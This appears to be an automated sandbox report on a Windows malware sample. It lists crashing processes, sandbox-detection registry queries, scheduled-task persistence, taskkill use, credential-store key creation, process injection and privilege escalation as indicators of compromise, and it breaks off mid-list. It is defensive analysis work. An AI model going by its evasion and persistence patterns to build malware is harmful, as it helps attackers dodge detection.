WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 6928 5588 WerFault.exe Vgb9MSUHJnGgHNOrMsbi_BKX.exe 5384 7096 WerFault.exe rundll32.exe 1364 5236 WerFault.exe 3dMI4Si0Juc8JmYItUK1_bOX.exe 5508 3160 WerFault.exe Sat01866e4ba0024d.exe 6864 5924 WerFault.exe qm3T17zb2S0FFFQu0bRAfL_O.exe 7424 5596 WerFault.exe FOGl6ElFqFbTpkovg9hhVPi3.exe 7492 4788 WerFault.exe FOGl6ElFqFbTpkovg9hhVPi3.exe 7916 5608 WerFault.exe qWZSTdOhU4VG7egnd7FPanGp.exe 8076 1348 WerFault.exe fx6ZjM_T3TYXA8Vgl8TM4_N8.exe 6560 5424 WerFault.exe Soft1WW01.exe 6084 1064 WerFault.exe setup.exe 4588 7724 WerFault.exe dPDD1_x1AYINcoVmULBbF_RG.exe 6300 7696 WerFault.exe KngXFzzriYmz7oZXLnNJ7Oje.exe 7772 8024 WerFault.exe 28Fes2YSzGb2vczE9pkmn4AA.exe 1648 7560 WerFault.exe qMMgF0iy9oz3KXaRZNQHcx4E.exe 7372 8048 WerFault.exe zYdlxzTOubkxt6qsS_obRu5x.exe 7112 5996 WerFault.exe 1386.exe 1500 4740 WerFault.exe powershell.exe 6944 6272 WerFault.exe 5C69.exe 4384 7148 WerFault.exe 65A2.exe 2284 5624 WerFault.exe powershell.exe 4664 5888 WerFault.exe powershell.exe 5764 2904 WerFault.exe powershell.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
D6C9.exeLRSqKfZCaNZ_zXzXGAw7tCbk.exedescription ioc process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI D6C9.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI D6C9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI LRSqKfZCaNZ_zXzXGAw7tCbk.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI LRSqKfZCaNZ_zXzXGAw7tCbk.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI LRSqKfZCaNZ_zXzXGAw7tCbk.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI D6C9.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exeWerFault.exeWerFault.exeCalculator.exeWerFault.exeWerFault.exeWerFault.exeConhost.execonhost.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeservices32.exeWerFault.exeCalculator.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 Calculator.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Conhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz conhost.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz services32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier Conhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Calculator.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Conhost.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Calculator.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision services32.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString services32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Calculator.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier Calculator.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 services32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 services32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Calculator.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier conhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision Calculator.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 conhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe -
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 6416 schtasks.exe 6964 schtasks.exe 4696 schtasks.exe 3740 schtasks.exe 2612 schtasks.exe 5444 schtasks.exe -
Enumerates system info in registry 2 TTPs 49 IoCs
Processes:
WerFault.exeWerFault.exeCalculator.exeWerFault.exemsedge.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeservices32.exeWerFault.exeWerFault.exeWerFault.exeConhost.exeWerFault.execonhost.exeCalculator.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Calculator.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS services32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Conhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU conhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU services32.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Calculator.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Calculator.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Calculator.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Conhost.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS conhost.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe -
Kills process with taskkill 7 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 8092 taskkill.exe 4208 taskkill.exe 6308 taskkill.exe 4696 taskkill.exe 4672 taskkill.exe 5948 taskkill.exe 2912 taskkill.exe -
Processes:
cmstp.exedescription ioc process Key created \Registry\User\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 cmstp.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
svchost.exeWaaSMedicAgent.exeWaaSMedicAgent.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordLength = "8" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordCharacterGroups = "2" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe -
Modifies registry class 5 IoCs
Processes:
Explorer.EXEdescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exeSat016e74da9cbf1.exeSat0188dba58af938.exepid process 2664 powershell.exe 2664 powershell.exe 2264 powershell.exe 2264 powershell.exe 3788 Sat016e74da9cbf1.exe 3788 Sat016e74da9cbf1.exe 3788 Sat016e74da9cbf1.exe 3788 Sat016e74da9cbf1.exe 3788 Sat016e74da9cbf1.exe 3788 Sat016e74da9cbf1.exe 3788 Sat016e74da9cbf1.exe 3788 Sat016e74da9cbf1.exe 3788 Sat016e74da9cbf1.exe 3788 Sat016e74da9cbf1.exe 3788 Sat016e74da9cbf1.exe 3788 Sat016e74da9cbf1.exe 3788 Sat016e74da9cbf1.exe 3788 Sat016e74da9cbf1.exe 3788 Sat016e74da9cbf1.exe 3788 Sat016e74da9cbf1.exe 3788 Sat016e74da9cbf1.exe 3788 Sat016e74da9cbf1.exe 3788 Sat016e74da9cbf1.exe 3788 Sat016e74da9cbf1.exe 3788 Sat016e74da9cbf1.exe 3788 Sat016e74da9cbf1.exe 3788 Sat016e74da9cbf1.exe 3788 Sat016e74da9cbf1.exe 3788 Sat016e74da9cbf1.exe 3788 Sat016e74da9cbf1.exe 3788 Sat016e74da9cbf1.exe 3788 Sat016e74da9cbf1.exe 4872 Sat0188dba58af938.exe 3788 Sat016e74da9cbf1.exe 4872 Sat0188dba58af938.exe 3788 Sat016e74da9cbf1.exe 4872 Sat0188dba58af938.exe 4872 Sat0188dba58af938.exe 4872 Sat0188dba58af938.exe 4872 Sat0188dba58af938.exe 3788 Sat016e74da9cbf1.exe 4872 Sat0188dba58af938.exe 4872 Sat0188dba58af938.exe 3788 Sat016e74da9cbf1.exe 4872 Sat0188dba58af938.exe 4872 Sat0188dba58af938.exe 4872 Sat0188dba58af938.exe 4872 Sat0188dba58af938.exe 3788 Sat016e74da9cbf1.exe 3788 Sat016e74da9cbf1.exe 3788 Sat016e74da9cbf1.exe 3788 Sat016e74da9cbf1.exe 4872 Sat0188dba58af938.exe 4872 Sat0188dba58af938.exe 3788 Sat016e74da9cbf1.exe 3788 Sat016e74da9cbf1.exe 4872 Sat0188dba58af938.exe 4872 Sat0188dba58af938.exe 3788 Sat016e74da9cbf1.exe 3788 Sat016e74da9cbf1.exe 4872 Sat0188dba58af938.exe 4872 Sat0188dba58af938.exe 3788 Sat016e74da9cbf1.exe 3788 Sat016e74da9cbf1.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3196 Explorer.EXE -
Suspicious behavior: MapViewOfSection 9 IoCs
Processes:
okMapBnuwoKkFkv6DNJnxaAd.exeLRSqKfZCaNZ_zXzXGAw7tCbk.execmstp.exeD6C9.exepid process 3372 okMapBnuwoKkFkv6DNJnxaAd.exe 3372 okMapBnuwoKkFkv6DNJnxaAd.exe 3372 okMapBnuwoKkFkv6DNJnxaAd.exe 7024 LRSqKfZCaNZ_zXzXGAw7tCbk.exe 6956 cmstp.exe 6956 cmstp.exe 6956 cmstp.exe 6956 cmstp.exe 5388 D6C9.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
Processes:
msedge.exepid process 7388 msedge.exe 7388 msedge.exe 7388 msedge.exe 7388 msedge.exe 7388 msedge.exe 7388 msedge.exe 7388 msedge.exe 7388 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
svchost.exeSat01e3b3e0fa80800c.exeSat01b537da2e0af175a.exepowershell.exepowershell.exesvchost.exeSat01c5002407.exenYM_HzkzBazNv3s7A45da1FV.exedescription pid process Token: SeShutdownPrivilege 2432 svchost.exe Token: SeCreatePagefilePrivilege 2432 svchost.exe Token: SeShutdownPrivilege 2432 svchost.exe Token: SeCreatePagefilePrivilege 2432 svchost.exe Token: SeShutdownPrivilege 2432 svchost.exe Token: SeCreatePagefilePrivilege 2432 svchost.exe Token: SeCreateTokenPrivilege 4692 Sat01e3b3e0fa80800c.exe Token: SeAssignPrimaryTokenPrivilege 4692 Sat01e3b3e0fa80800c.exe Token: SeLockMemoryPrivilege 4692 Sat01e3b3e0fa80800c.exe Token: SeIncreaseQuotaPrivilege 4692 Sat01e3b3e0fa80800c.exe Token: SeMachineAccountPrivilege 4692 Sat01e3b3e0fa80800c.exe Token: SeTcbPrivilege 4692 Sat01e3b3e0fa80800c.exe Token: SeSecurityPrivilege 4692 Sat01e3b3e0fa80800c.exe Token: SeTakeOwnershipPrivilege 4692 Sat01e3b3e0fa80800c.exe Token: SeLoadDriverPrivilege 4692 Sat01e3b3e0fa80800c.exe Token: SeSystemProfilePrivilege 4692 Sat01e3b3e0fa80800c.exe Token: SeSystemtimePrivilege 4692 Sat01e3b3e0fa80800c.exe Token: SeProfSingleProcessPrivilege 4692 Sat01e3b3e0fa80800c.exe Token: 